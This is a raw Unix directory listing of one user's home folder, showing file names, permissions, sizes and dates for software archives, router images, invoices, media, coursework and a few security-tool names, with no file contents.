-rw-r--r--    1 thalakan  thalakan         107 Jan 24  2002 asi-notes.txt
-rw-r--r--    1 thalakan  thalakan      671516 Sep 11  2004 asns.txt
-rw-r--r--    1 thalakan  thalakan      106496 Nov 11  2002 asterisk-shipped.tar.gz
-rw-------    1 thalakan  thalakan       46154 Jan 31  2002 at_the_tone_807.au
-rwxr--r--    1 thalakan  thalakan        2870 Mar 19  2004 atomicity.c
-rw-r--r--    1 thalakan  thalakan       12758 Aug 30  2005 august
-rw-r--r--    1 thalakan  thalakan        6784 Aug 31  2005 august.1
-rw-r--r--    1 thalakan  thalakan        2886 Aug 17  2007 august.1.txt
-rw-r--r--    1 thalakan  thalakan      220792 Aug  9  2008 august.ldif
-rwxr-xr-x    1 thalakan  thalakan        3664 Mar 13  2002 authorizenet.pl
-rwxr-xr-x    1 thalakan  thalakan        3924 Oct 22  2008 automat.py
-rw-r--r--    1 thalakan  thalakan          12 Oct 22  2008 automat.sh
-rw-r--r--    1 thalakan  thalakan        2016 Aug 22  2008 azn_jesus@219-89-166-156.jetstart.xtra.co.nz
-rw-r--r--    1 thalakan  thalakan        5585 Jul 12  2005 b.asm
-rw-------    1 thalakan  thalakan        1068 Nov  6  2006 b6-transcript.txt
-rw-------    1 thalakan  thalakan        1375 Nov  6  2006 b7.scm
-rwxr--r--    1 thalakan  thalakan        2359 Dec 12  2002 backup.txt
-rw-r--r--    1 thalakan  thalakan        7652 Aug 23  2002 bad.txt
-rw-r--r--    1 thalakan  thalakan     1758079 Nov 19  2002 badnetware.cap
-rw-r--r--    1 thalakan  thalakan          11 Apr 19 16:51 bannor.txt
-rw-------    1 thalakan  thalakan       15625 Nov 17  2002 bare_conf.tex
-rw-------    1 thalakan  thalakan       19196 Nov 17  2002 bare_jrnl.tex
drwxr-xr-x   12 thalakan  thalakan        2560 Jan 11  2009 bash-3.2.48
-rw-r--r--    1 thalakan  thalakan     2541712 Jan  5  2009 bash-3.2.48.tar.gz
-rw-r--r--    1 thalakan  thalakan         475 Apr 18 23:25 bash-hosts.txt
-rw-r--r--    1 thalakan  thalakan         475 Apr 18 23:17 bash-hosts.txt~
-rw-r--r--    1 thalakan  thalakan         101 Jul 24  2002 batch_csv.csv
-rwx------    1 thalakan  thalakan    36552008 Jun  8  2006 baundemaym.exe
-rw-r--r--    1 thalakan  thalakan      229376 May 13  2003 bayonne-1.0.8.tar.gz
-rwxr-xr-x    1 thalakan  thalakan      825092 Feb 20  2002 bayonne.bin
-rw-r--r--    1 thalakan  thalakan      134784 Jan  6  2005 best.jpg
drwxr-xr-x    2 thalakan  thalakan         512 Dec  1  2008 bin
-rw-r--r--    1 thalakan  thalakan          72 Jun  9  2006 bin.txt
-rw-r--r--    1 thalakan  thalakan     9985319 Dec 28  2002 binutils-2.13.2.tar.bz2
-rw-r--r--    1 thalakan  thalakan         333 Nov 28  2006 black magic for dummies.txt
-rw-r--r--    1 thalakan  thalakan        9451 Jun  2 14:05 blah.html
-rwxr-xr-x    1 thalakan  thalakan        3099 Jan  1  2009 blah.pl
-rwxr-xr-x    1 thalakan  thalakan       30312 Dec 22  2002 blddeps_conf.tex
-rw-r--r--    1 thalakan  thalakan        4887 Mar 13  2002 bop-authorizenet-diff
-rwxr-xr-x    1 thalakan  thalakan        7084 Apr 18 23:40 bso.so
-rw-r--r--    1 thalakan  thalakan         652 Oct  5  2007 bug1.txt
-rw-r--r--    1 thalakan  thalakan          69 Jul 23  2002 bugreport
-rw-------    1 thalakan  thalakan        4984 Apr 18  2002 bugreports.txt
-rw-------    1 thalakan  thalakan        4550 Apr 18  2002 bugreports.txt~
-rw-r--r--    1 thalakan  thalakan          65 Nov 24  2004 bwmon.log
-rwxr-xr-x    1 thalakan  thalakan        1207 Nov 24  2004 bwmon.pl
-rwxr-xr-x    1 thalakan  thalakan        1171 Nov 24  2004 bwmon.pl~
-rw-r--r--    1 thalakan  thalakan         136 Jun 20  2002 bytecode
-rw-r--r--    1 thalakan  thalakan      572958 Mar 11  2002 bzImage
drwxr-xr-x    2 thalakan  thalakan         512 May  5  2005 c1
-rwxr-xr--    1 thalakan  thalakan    10568040 Mar 12 12:12 c1700-ipbase-mz_124-1c.
-rw-r--r--    1 thalakan  thalakan     4902344 May  3  2002 c2500-i-l.113-4
-rw-r--r--    1 thalakan  thalakan           0 Sep 30  2008 c2600-i-mz-123-26.bin
-rw-r--r--    1 thalakan  thalakan     7754580 Mar 18  2008 c2600-i-mz.123-26.bin
-rw-r--r--    1 thalakan  thalakan        1347 May  3  2002 c2900-config
-rw-r--r--    1 thalakan  thalakan     1644046 May  3  2002 c2900XL-c3h2s-mz-120.5-XU.bin
-rw-r--r--    1 thalakan  thalakan      105961 May  3  2002 c2900XL-diag-mz-120.5-XU
-rw-r--r--    1 thalakan  thalakan     3100552 May  3  2002 c7200-boot-mz.120-16.S.bin
-rw-r--r--    1 thalakan  thalakan    12847544 Dec  2  2008 c815-ipbase-mz.124-15.T8.bin
-rw-r--r--    1 thalakan  thalakan        3839 Apr  6 03:26 ca20.log
-rw-r--r--    1 thalakan  thalakan         870 Feb 22 02:19 ca20.log~
-rw-r--r--    1 thalakan  thalakan       21706 Feb  7  2002 calls.jpg
-rw-r--r--    1 thalakan  thalakan       51891 May 21  2003 cam.jpg
-rwxr-xr-x    1 thalakan  thalakan       49588 Apr 13  2005 can
-rw-r--r--    1 thalakan  thalakan          19 Apr 11  2005 can.c
-rw-r--r--    1 thalakan  thalakan         203 Apr 13  2005 can.f
-rwxr-xr-x    1 thalakan  thalakan         215 Mar 29  2004 catch.sh
-rwxr-xr-x    1 thalakan  thalakan         182 Mar 29  2004 catch.sh~
-rw-r--r--    1 thalakan  thalakan         462 Apr 25  2006 cc.txt.gpg
-rw-------    1 thalakan  thalakan        8604 Sep  9  2002 cca_paisa.wav
-rw-------    1 thalakan  thalakan        6880 Sep  9  2002 cca_taka.wav
-rwxr-xr-x    1 thalakan  thalakan        5147 Aug 13  2002 ccd.pl
-rw-r--r--    1 thalakan  thalakan    25440256 May 30  2004 chase&tycho.mov
-rwxr-xr-x    1 thalakan  thalakan         112 Apr 11  2008 checkpid.sh
-rw-r--r--    1 thalakan  thalakan     3512320 May 28  2002 cher.mpa
-rwxr-xr-x    1 thalakan  thalakan         367 Apr  8  2002 chkmonitor.sh
drwxr-xr-x    2 thalakan  thalakan        1024 Apr  3  2005 chkrootkit-0.45
-rw-r--r--    1 thalakan  thalakan       36359 Apr  3  2005 chkrootkit.tar.gz
drwxr-xr-x    2 thalakan  thalakan         512 Nov 23  2008 churchcutsintobeertime.com
-rw-r--r--    1 thalakan  thalakan      180224 May 29  2002 cid.txt
-rw-r--r--    1 thalakan  thalakan         560 May 17  2002 cidlog.scr
-rw-r--r--    1 thalakan  thalakan      960044 Sep  8  2002 cidtest.wav
-rw-r--r--    1 thalakan  thalakan      226717 Sep  8  2002 cidtest.zip
-rw-r--r--    1 thalakan  thalakan      236304 May  4  2005 cmd-2k.exe
-rw-r--r--    1 thalakan  thalakan         494 Feb 27  2005 cmdline.c
-rw-r--r--    1 thalakan  thalakan         111 May  3  2007 cmdsvc.cmd
-rw-r--r--    1 thalakan  thalakan       12225 May  2  2003 cmdwatch-0.2.0.tar.gz
-rw-r--r--    1 thalakan  thalakan        1182 Jun 15  2003 cmosdump.c
-rw-r--r--    1 thalakan  thalakan         488 Feb  7  2003 cmoswipe
-rw-r--r--    1 thalakan  thalakan           0 Dec  3  2008 cocks.dat
-rwxr-xr-x    1 thalakan  thalakan         105 Nov 20  2007 colorize.pl
-rw-r--r--    1 thalakan  thalakan           9 Nov 20  2007 colors.txt
-rw-r--r--    1 thalakan  thalakan        1359 Feb 21 22:07 computerservice.txt
-rw-r--r--    1 thalakan  thalakan        1154 Feb 21 14:25 computerservice.txt~
-rw-r--r--    1 thalakan  thalakan       73913 Jan 24  2002 console_start.cs
-rw-r--r--    1 thalakan  thalakan         487 Jan 23  2003 convert.pl
-rwxr-xr-x    1 thalakan  thalakan         306 Jun 23  2003 convert2.pl
drwxr-xr-x    2 thalakan  thalakan        1536 Nov  9  2004 courierimaphieracl
drwxr-x---    2 thalakan  thalakan         512 Nov  9  2004 courierimapkeywords
-rw-r--r--    1 thalakan  thalakan           6 Nov  9  2004 courierimapsubscribed
-rw-r--r--    1 thalakan  thalakan          15 Nov  9  2004 courierimapuiddb
-rw-r--r--    1 thalakan  thalakan      162114 Jun 12  2007 crack.zip
-rw-r--r--    1 thalakan  thalakan       21579 Apr  5  2003 cracknotes.txt
-rw-r--r--    1 thalakan  thalakan       21555 Apr  5  2003 cracknotes.txt~
drwxr-xr-x    3 thalakan  thalakan         512 Aug 31  2002 craigslist
-rw-r--r--    1 thalakan  thalakan        1455 Feb 22 15:26 craigslistad.txt
-rw-r--r--    1 thalakan  thalakan         512 Dec 12  2004 crap
-rwxr-xr--    1 thalakan  thalakan      201312 May  4 12:34 crash.ifo
-rwxr-xr-x    1 thalakan  thalakan       15592 Apr  4  2003 crazy
-rw-r--r--    1 thalakan  thalakan       10185 Apr  4  2003 crazy.c
-rw-r--r--    1 thalakan  thalakan       10155 Sep  4  2002 creditappUS.rtf
-rwxr--r--    1 thalakan  thalakan        1522 Feb  7  2003 cs-170.txt
-rw-r--r--    1 thalakan  thalakan   352750592 Sep  6  2005 cs61a-su05-cs61a.tar
-rw-r--r--    1 thalakan  thalakan        5772 Nov 24  2004 cssource_class.php
drwxr-xr-x    3 thalakan  thalakan        2560 Jun 22  2005 ctorrent-1.3.4
-rwx------    1 thalakan  thalakan     1605317 Aug 13  2004 curl-7.12.0-vms-axp.zip
drwxr-xr-x    4 thalakan  thalakan         512 Jun  6  2003 cvsroot
drwxr-xr-x    3 thalakan  thalakan         512 Jun  6  2003 cvsweb
-rw-r--r--    1 thalakan  thalakan      896683 May 11 14:04 cycle-aslinks.l7.t1.c000490.20090508.txt
drwxr-xr-x    2 thalakan  thalakan         512 Aug  5  2007 damn
-rw-r--r--    1 thalakan  thalakan       81563 Jan 27  2002 darkbot-6f6-r6.tar.gz
drwxr-xr-x    8 thalakan  thalakan        1024 Mar 16  2002 darkbot6f6
drwxr-xr-x    2 thalakan  thalakan         512 Sep 11  2004 data
-rw-r--r--    1 thalakan  thalakan        1492 Nov 24  2004 data.txt
-rw-r--r--    1 thalakan  thalakan   160426792 Sep 24  2007 databases.sql
drwxr-xr-x    2 thalakan  thalakan         512 Sep  5  2007 datasheetporn
-rw-------    1 thalakan  thalakan       42439 Nov 17  2002 db_conf.tex
-rw-r--r--    1 thalakan  thalakan         141 May  4  2005 dc13.txt
-rw-r--r--    1 thalakan  thalakan        3976 Jun 22  2006 dc14.txt
-rw-r--r--    1 thalakan  thalakan         347 May  9  2006 dc14.txt~
-rw-r--r--    1 thalakan  thalakan  4515559424 Apr 29 13:14 dc3-1.iso
-rw-r--r--    1 thalakan  thalakan   835713024 Apr 29 15:20 dc3-2.iso
-rw-------    1 thalakan  thalakan         591 Jan  3  2009 dead.letter
-rwxr-xr-x    1 thalakan  thalakan         946 Jun 21  2003 decrypt.pl
-rwxr--r--    1 thalakan  thalakan       28077 Jul 13  2003 defcon-network.png
-rwxr--r--    1 thalakan  thalakan         933 Jul 13  2003 defcon1.png
-rw-r--r--    1 thalakan  thalakan    37960995 Nov 29  2002 defconx.wmv
-rw-r--r--    1 thalakan  thalakan       40472 Nov  7  2008 deliciousapi.py
-rw-r--r--    1 thalakan  thalakan       34369 Nov  7  2008 deliciousapi.pyc
-rwxr-xr-x    1 thalakan  thalakan       12405 Nov 22  2006 dhry
-rw-r--r--    1 thalakan  thalakan       72812 Aug 25  1990 dhry-c
-rw-r--r--    1 thalakan  thalakan       18418 Nov 22  2006 dhry.h
-rw-r--r--    1 thalakan  thalakan       11682 Nov 22  2006 dhry_1.c
-rw-r--r--    1 thalakan  thalakan        6788 Nov 22  2006 dhry_1.o
-rw-r--r--    1 thalakan  thalakan        5273 Nov 22  2006 dhry_2.c
-rw-r--r--    1 thalakan  thalakan        1426 Nov 22  2006 dhry_2.o
-rw-r--r--    1 thalakan  thalakan        4354 Nov 22  2006 dhry_c.dif
-rw-r--r--    1 thalakan  thalakan         475 Sep  3  2004 dirs
drwxr-xr-x    4 thalakan  thalakan         512 Feb 24  2002 distro.ibiblio.org
-rwxr-xr-x    1 thalakan  thalakan        5536 Nov  8  2004 dns
-rwxr--r--    1 thalakan  thalakan        3754 Sep 13  2004 dns.c
-rwxr--r--    1 thalakan  thalakan        4181 Sep 13  2004 dns.h
-rw-r--r--    1 thalakan  thalakan          57 May 10  2007 dongs.sh
drwxr-xr-x    2 thalakan  thalakan         512 Nov  9  2006 donkey pr0n
-rw-r--r--    1 thalakan  thalakan        2310 Mar 30  2006 donot.c
-rw-r--r--    1 thalakan  thalakan        4066 Sep 17  2002 doodle
-rwxr-xr-x    1 thalakan  thalakan       30787 Apr  6  2005 door
-rw-r--r--    1 thalakan  thalakan        5418 Apr  6  2005 door.c
-rw-r--r--    1 thalakan  thalakan        5448 Mar 19  2004 door.c~
-rw-r--r--    1 thalakan  thalakan         482 Jun  2  2002 driver-powerpc-diff
-rw-r--r--    1 thalakan  thalakan     5697017 Apr  8  2003 drivers.tgz.1
-rwx------    1 thalakan  thalakan       13154 Dec 22  2007 drives.ods
-rw-r--r--    1 thalakan  thalakan         105 Jul 29  2005 drkey.key
drwx------    6 thalakan  thalakan        4096 Jul 12  2005 dropbear-0.46
-rw-r--r--    1 thalakan  thalakan     1413918 Jul  8  2005 dropbear-0.46.tar.bz2
-rw-r--r--    1 thalakan  thalakan       14517 Feb 28  2002 drowe.jpg
-rw-r--r--    1 thalakan  thalakan       17433 Feb 28  2002 drowe2.jpg
-rw-r--r--    1 thalakan  thalakan         393 Jun  3  2005 dujour-scan
-rwxr-xr-x    1 thalakan  thalakan          91 Apr  5  2005 dump_nist.sh
-rw-r--r--    1 thalakan  thalakan       11458 Aug 13  2002 dup.sh
-rw-------    1 thalakan  thalakan        3392 Jan 24  2002 eNet::Telnet::Cisco;
-rw-r--r--    1 thalakan  thalakan          90 Feb 16 20:10 e_me_tmp
-rw-r--r--    1 thalakan  thalakan      103506 Aug 31  2004 ebs.hex
-rw-r--r--    1 thalakan  thalakan      170340 Aug 31  2004 ebs1.hex
-rw-r--r--    1 thalakan  thalakan      170340 Aug 31  2004 ebs2.hex
-rw-r--r--    1 thalakan  thalakan       34813 Aug 29  2004 ebs_1.mp3
-rw-r--r--    1 thalakan  thalakan       34813 Aug 29  2004 ebs_2.mp3
drwxr-xr-x   11 thalakan  thalakan        1536 Nov 15  2005 eggdrop1.6.17
-rw-r--r--    1 thalakan  thalakan      805376 Sep  8  2005 eggdrop1.6.17.tar.bz2
-rwxr-xr-x    1 thalakan  thalakan        4301 Jul 29  2005 eip2eax
-rw-r--r--    1 thalakan  thalakan         337 Jun  6  2005 eip2eax.c
-rw-r--r--    1 thalakan  thalakan         269 Jun  6  2005 eip2eax.c~
-rw-r--r--    1 thalakan  thalakan       40960 Feb 18  2004 eject.exe
-rw-r--r--    1 thalakan  thalakan         372 Dec  9  2004 emails.txt
-rwxr-xr-x    1 thalakan  thalakan        7324 Dec 13  2004 emfsploit
-rw-r--r--    1 thalakan  thalakan        8524 Dec 13  2004 emfsploit.c
-rw-r--r--    1 thalakan  thalakan        3304 Jul 28  2006 emo.txt
-rw-r--r--    1 thalakan  thalakan      117760 Apr 29  2002 enastspec-projecta.doc
-rw-r--r--    1 thalakan  thalakan       40065 May 31  2002 enastspec-projecta.pdf
-rw-r--r--    1 thalakan  thalakan      169984 Apr  2  2002 enastspec.doc
-rwxr-xr-x    1 thalakan  thalakan         605 May 26  2003 enum-leases.pl
-rw-r--r--    1 thalakan  thalakan         559 Aug  9  2002 estimate8.txt
-rw-r--r--    1 thalakan  thalakan    10106726 Mar 10  2003 ethereal-setup-0.9.11.exe
-rwxr-xr-x    1 thalakan  thalakan        2348 Sep 11  2004 extractasnames.pl
drwxr-xr-x    2 thalakan  thalakan         512 Feb  5  2008 farmkeys
drwxr-xr-x   10 thalakan  thalakan        1024 Aug 14  2005 fedora-ds-7.1
-rw-r--r--    1 thalakan  thalakan     4476825 May 31  2005 fedora-ds-7.1.tar.gz
-rw-r--r--    1 thalakan  thalakan     2262440 Sep 14  2007 file_format_specification_v9.pdf
-rw-r--r--    1 thalakan  thalakan    29789365 Oct 22  2004 files
-rw-r--r--    1 thalakan  thalakan        5822 Dec  6  2005 firearms.txt
-rw-r--r--    1 thalakan  thalakan        1158 Aug 27  2003 fix.sh
-rw-r--r--    1 thalakan  thalakan      145088 Apr 22  2002 foo-ost.wav.gz
-rw-r--r--    1 thalakan  thalakan          78 Feb 18  2002 foo.c
-rw-r--r--    1 thalakan  thalakan        1511 Jul  1  2002 foo.gpg
-rw-r--r--    1 thalakan  thalakan      320046 Apr 22  2002 foo.wav
-rw-r--r--    1 thalakan  thalakan       65069 Apr 22  2002 foo.wav.gz
-rw-r--r--    1 thalakan  thalakan         136 Mar  7  2002 foo2
-rw-r--r--    1 thalakan  thalakan      320046 May  9  2002 foo3.wav
-rwxr-xr-x    1 thalakan  thalakan         212 Apr 18 23:44 for-all-hosts.sh
-rw-r--r--    1 thalakan  thalakan      100228 Jun  2  2007 forensics200.bin
-rw-r--r--    1 thalakan  thalakan       69633 Jun 11  2007 fr-030_candytron_final.zip
drwxr-xr-x   13 thalakan  thalakan         512 Dec 13  2004 framework-2.2
-rw-r--r--    1 thalakan  thalakan     1294164 Aug  8  2004 framework-2.2.tar.gz
-rw-------    1 thalakan  thalakan         258 Jan 24  2002 from
-rw-r--r--    1 thalakan  thalakan         301 Apr  3  2002 frys
-rw-r--r--    1 thalakan  thalakan       14848 Dec 12  2002 frys2002.xls
-rw-r--r--    1 thalakan  thalakan        1951 May 10  2006 fuckingstop.c
-rwxr-xr-x    1 thalakan  thalakan        5805 Sep 13  2007 fun
-rw-r--r--    1 thalakan  thalakan        1335 Sep 13  2007 fun.c
-rw-r--r--    1 thalakan  thalakan         576 Dec 13  2004 fun.emf
-rw-r--r--    1 thalakan  thalakan        2593 Nov 30  2005 fun.html
-rw-r--r--    1 thalakan  thalakan      140046 May 11  2005 fun.zip
drwxr-xr-x   14 thalakan  thalakan        1024 Aug 26  2005 gaim
-rw-r--r--    1 thalakan  thalakan       21191 Jul  7  2006 gdb_init
-rwxr-xr-x    1 thalakan  thalakan         252 Sep 27  2002 getasns.pl
-rwxr-xr-x    1 thalakan  thalakan        5112 Oct 24  2004 getpeername
-rw-r--r--    1 thalakan  thalakan         783 Oct 24  2004 getpeername.c
-rw-r--r--    1 thalakan  thalakan         564 Oct 24  2004 getpeername.c~
-rw-r--r--    1 thalakan  thalakan          11 Oct 30  2007 ghetto-colo
-rwxr-xr-x    1 thalakan  thalakan        5808 Jun  1  2008 gobbledong
-rw-r--r--    1 thalakan  thalakan        1037 Nov 10  2006 gobbledong.c
-rwxr-xr-x    1 thalakan  thalakan          82 Sep 16  2005 google
-rw-------    1 thalakan  thalakan    62914560 Jan 20 16:19 government documents.truecrypt
-rw-r--r--    1 thalakan  thalakan         361 Dec  2  2008 graendalfuck
-rw-r--r--    1 thalakan  thalakan       11289 Jan 24  2002 groo
-rw-r--r--    1 thalakan  thalakan        1988 Jun  5  2004 gui.mm
-rw-r--r--    1 thalakan  thalakan      272853 Apr  6  2002 ha.tar.gz
-rwxr-xr-x    1 thalakan  thalakan       30056 Mar 19  2004 hackme
-rwxr--r--    1 thalakan  thalakan        5988 Mar 19  2004 hackme.c
-rwxr--r--    1 thalakan  thalakan        5934 Mar 19  2004 hackme.c~
-rw-r--r--    1 thalakan  thalakan         237 Aug 22  2005 halts.png
-rw-r--r--    1 thalakan  thalakan         175 Aug 22  2005 halts.png.0
-rw-r--r--    1 thalakan  thalakan         139 Aug 22  2005 halts.png.1
-rw-r--r--    1 thalakan  thalakan         143 Aug 22  2005 halts.png.2
-rw-r--r--    1 thalakan  thalakan         126 Aug 22  2005 halts.png.3
-rw-r--r--    1 thalakan  thalakan         115 Aug 22  2005 halts.png.4
-rw-r--r--    1 thalakan  thalakan         237 Aug 22  2005 halts2.png
-rw-r--r--    1 thalakan  thalakan        1662 Mar 20  2002 handler.pl
-rw-r--r--    1 thalakan  thalakan        3698 Jun  2 19:10 hardcopy.0
-rw-r--r--    1 thalakan  thalakan        2196 Feb 10  2004 hardcopy.1
-rw-r--r--    1 thalakan  thalakan         539 Dec  3  2008 hardcopy.2
-rw-r--r--    1 thalakan  thalakan        3490 Apr  2  2006 hardcopy.3
-rw-r--r--    1 thalakan  thalakan        1100 May 31  2006 hardcopy.4
-rw-r--r--    1 thalakan  thalakan         601 Jan 31 14:23 hardcopy.5
drwxr-xr-x    3 thalakan  thalakan         512 Sep  8  2007 hautesecure
-rw-------    1 thalakan  thalakan       19760 Sep 12  2007 hautesecure.xpi
-rw-r--r--    1 thalakan  thalakan       12288 Mar  2  2004 hbeeime.exe
-rwxr--r--    1 thalakan  thalakan        2689 Aug 26  2003 hd3.c
-rw-r--r--    1 thalakan  thalakan       18867 Aug 28  2002 hda.c
-rw-r--r--    1 thalakan  thalakan         713 Nov  2  2006 hexdump.c
-rwxr-xr-x    1 thalakan  thalakan     2981254 Oct 11  2004 hldsupdatetool.bin
-rw-r--r--    1 thalakan  thalakan       12800 Aug 24  2002 hmmi-quote.doc
-rw-r--r--    1 thalakan  thalakan      269810 Sep 16  2002 hmmi-quote2.pdf
-rw-r--r--    1 thalakan  thalakan        1527 May 21  2003 homework7.zip
-rw-r--r--    1 thalakan  thalakan        8379 May 21  2003 homework8.zip
-rw-r--r--    1 thalakan  thalakan        2597 May 21  2003 homework9.zip
-rw-------    1 thalakan  thalakan       20238 Jul 24  2002 hostdsp.cpp
-rw-r--r--    1 thalakan  thalakan         917 Jun  9 15:53 hosts.txt
-rw-r--r--    1 thalakan  thalakan         454 Apr  8 14:46 hosts.txt~
-rw-r--r--    1 thalakan  thalakan         638 Apr 24  2002 howl.cpp
drwxr-xr-x    2 thalakan  thalakan         512 Jun  5  2006 hrdwrinv
drwxr-xr-x    3 thalakan  thalakan        1536 Jul 13 11:05 hsq
-rw-r--r--    1 thalakan  thalakan        2249 Mar  4 14:24 hsqual.txt
-rw-r--r--    1 thalakan  thalakan        1661 Mar  4 11:56 hsqual.txt~
-rw-r--r--    1 thalakan  thalakan          23 Jan 24  2002 ht_passwd
-rw-r--r--    1 root      thalakan   186666127 Sep 24  2007 httpd-lc.log
-rw-r--r--    1 root      thalakan    27705678 Oct 19  2005 httpd-six-error.log
drwxr-xr-x    4 thalakan  thalakan         512 Aug 31  2006 iTunes Music
-r--r--r--    1 thalakan  thalakan      229351 May 29  2002 ibcs-2.1-981105.tar.gz
-rw-r--r--    1 thalakan  thalakan        1850 Dec 19  2002 id_digrev.asc
-rwx------    1 thalakan  thalakan         668 Jun 11  2004 id_dsa
-rw-r--r--    1 thalakan  thalakan         604 May  9  2002 id_dsa_voip_vpn.pub
-rw-r--r--    1 thalakan  thalakan    30908120 Aug 14  2005 ida48.exe
drwxr-xr-x   10 thalakan  thalakan         512 Apr 25  2006 idastd
-rw-r--r--    1 thalakan  thalakan       13562 Dec 13  2004 iframesploit
-rw-r--r--    1 thalakan  thalakan         876 Jan 31 15:55 index.html?webmaster=interesting&program=tube4free&page=&warnDisp=yes
-rw-r--r--    1 thalakan  thalakan       10812 Mar 29  2004 index.rss
-rw-r--r--    1 thalakan  thalakan       10820 Mar 29  2004 index.rss.1
-rw-r--r--    1 thalakan  thalakan      902048 Jan 27  2002 info2.db
-rw-r--r--    1 thalakan  thalakan      860514 Mar 11  2002 initrd.tar.gz
drwx------    3 thalakan  thalakan        1024 Mar 31  2006 injectso-0.2
-rw-r--r--    1 thalakan  thalakan       80253 Jul 25  2003 injectso-0.2.1.tar.gz
-rw-r--r--    1 thalakan  thalakan       80367 Jul 25  2003 injectso-0.2.tar.gz
-rw-r--r--    1 thalakan  thalakan       80367 Jul 25  2003 injectso-0.2.tar.gz.1
-rw-r--r--    1 thalakan  thalakan          18 Feb 26  2003 input.txt
-rw-rw-r--    1 thalakan  thalakan         728 May 29  2002 installkernel
drwxr-xr-x    3 thalakan  thalakan        1024 Aug  2  2005 interceptty-0.6
-rw-r--r--    1 thalakan  thalakan       95911 Sep  5  2004 interceptty-0.6.tar.gz
-rw-r--r--    1 thalakan  thalakan       17030 Apr 14  2003 interzone-report.txt
-rwxr--r--    1 thalakan  thalakan      267264 Apr 10  2003 interzonetalk.ppt
-rw-r--r--    1 thalakan  thalakan     2535936 Jul  5  2005 intw2634.exe
-rw-r--r--    1 thalakan  thalakan       24963 Sep  2  2002 invoice.rtf
-rw-r--r--    1 thalakan  thalakan       12584 Sep 24  2002 invoice1.rtf
-rw-------    1 thalakan  thalakan         990 Sep 23  2002 invoice1.txt
-rw-r--r--    1 thalakan  thalakan       28369 Aug 20  2002 invoice10.rtf
-rw-r--r--    1 thalakan  thalakan       12880 Sep 24  2002 invoice2.rtf
-rw-------    1 thalakan  thalakan         967 Jan 10  2003 invoice2.txt
-rw-------    1 thalakan  thalakan         983 Aug  9  2002 invoice4.txt
drwxr-xr-x    2 thalakan  thalakan         512 Sep  9  2003 ip2asn
-rw-r--r--    1 thalakan  thalakan        5291 Aug  2  2004 ip2asn-v1.1.tar.gz
-rw-r--r--    1 thalakan  thalakan         153 Sep 13  2004 ips.sql
-rw-r--r--    1 thalakan  thalakan        1392 Jul 28  2008 ipt_NETFLOW-printf-args.patch
-rw-r--r--    1 thalakan  thalakan     1220652 Oct 10  2005 ipw2200-1.0.6-knoppix.tar.gz
-rw-r--r--    1 thalakan  thalakan         118 Jun  5  2007 irc-channels.txt
-rw-r--r--    1 root      wheel       15347181 May 26  2007 irc.pcap.gz
drwx------   12 thalakan  thalakan         512 Jun  5 16:04 irclogs
-rwxr-xr-x    1 thalakan  thalakan        9702 Feb  8 17:44 ittybitty
-rw-r--r--    1 thalakan  thalakan        1510 Feb  9 15:42 ittybitty.c
-rw-------    1 thalakan  thalakan      335872 Feb  8 17:37 ittybitty.core
-rw-r--r--    1 thalakan  thalakan         724 Feb  8 17:18 ittybitty.c~
-rw-r-----    1 thalakan  thalakan       36764 Sep  9  2002 ivr-000-1031276804.wav
-rw-r--r--    1 thalakan  thalakan        7818 May  7  2002 ivr4dummies.txt
-rw-r--r--    1 thalakan  thalakan        2787 May  7  2002 ivr4dummies.txt~
-rw-r--r--    1 thalakan  thalakan        9137 Mar 14  2005 iz4-2.txt
-rw-r--r--    1 thalakan  thalakan        9140 Mar 14  2005 iz4-2.txt~
-rwx------    1 thalakan  thalakan        9267 Mar 14  2005 iz4.txt
-rwxr-xr-x    1 thalakan  thalakan        4669 Oct  7  2005 izw1
-rw-r--r--    1 thalakan  thalakan         243 Oct  7  2005 izw1.c
-rw-------    1 thalakan  thalakan       25842 Jun 20  2005 jason.zip
drwxr-xr-x    2 thalakan  thalakan         512 Sep  5  2007 jasonspence
drwxr-xr-x    3 thalakan  thalakan         512 Apr 28  2002 jk2
-rw-r--r--    1 thalakan  thalakan           0 Jan 24  2002 john.ini
-rw-------    1 thalakan  thalakan           0 Jan 24  2002 john.pot
-rw-r--r--    1 thalakan  thalakan        2447 Apr 12  2002 jointest.cpp
-rw-r--r--    1 thalakan  thalakan         106 May  3  2007 jol.txt
-rwxr-xr-x    1 thalakan  thalakan       10733 Dec 13  2004 jpgsploit
-rw-r--r--    1 thalakan  thalakan        8632 Dec 13  2004 jpgsploit.c
-rw-r--r--    1 thalakan  thalakan        7170 Dec 13  2004 jpgsploit.c~
drwxr-xr-x    3 thalakan  thalakan        3584 Jul  6 15:00 jrstools
lrwxr-xr-x    1 thalakan  wheel             11 Jan 24  2002 jrsweb -> public_html
drwxr-xr-x    5 thalakan  thalakan         512 Jan  2  2008 jsrc
-rw-r--r--    1 thalakan  thalakan       11292 Aug 30  2005 july
-rw-r--r--    1 thalakan  thalakan        7476 Aug 30  2005 july.1
-rw-r--r--    1 thalakan  thalakan       16075 Aug 30  2005 june
-rw-r--r--    1 thalakan  thalakan        7475 Aug 30  2005 june.1
-rw-r--r--    1 thalakan  thalakan           0 Apr  4  2003 kernel
-rw-r--r--    1 thalakan  thalakan    34626859 Mar 24  2005 kernel-2.4.20-31.9HSQ.src.rpm
drwxr-xr-x    2 thalakan  thalakan        1024 Feb  8  2008 kernelz
-rw-r--r--    1 thalakan  thalakan        2008 Dec 30  2004 key
-rw-------    1 thalakan  thalakan        4500 Aug  6  2002 khook.c
-rwxr-xr-x    1 thalakan  thalakan          84 Aug 28  2003 kill.sh
-rw-r--r--    1 thalakan  thalakan       11348 Jan 24  2002 kscan_0002.jpeg
-r--r--r--    1 thalakan  thalakan       57640 May 29  2002 ksymoops-2.3.4.tar.gz
-rw-------    1 thalakan  thalakan     5176819 Jul 20 01:38 ktrace.out
-rw-r--r--    1 thalakan  thalakan       26169 Sep 12  2002 lackoffaith.ul
-rw-r--r--    1 thalakan  thalakan        3466 May  9  2006 last_will.txt.gpg
-rwxr-xr-x    1 thalakan  thalakan         138 Jul  5  2007 lastarg.sh
-rw-r--r--    1 thalakan  thalakan      218281 Jul 31  2008 ldap2.ldif
-rwxr-xr-x    1 thalakan  thalakan         368 Apr 26  2007 level1-update.sh
-rwx------    1 thalakan  thalakan        1320 May  4  2006 level1.h
-rwx------    1 thalakan  thalakan         938 Jul 26  2004 level1.h~
-rwxr-xr-x    1 thalakan  thalakan        8214 May  4  2006 level1_client
-rwx------    1 thalakan  thalakan        8196 Mar  1 01:20 level1_client.c
-rwx------    1 thalakan  thalakan        7111 May  4  2006 level1_client.c~
-rw-r--r--    1 thalakan  thalakan        5233 Aug  7  2004 level1_client_new.c
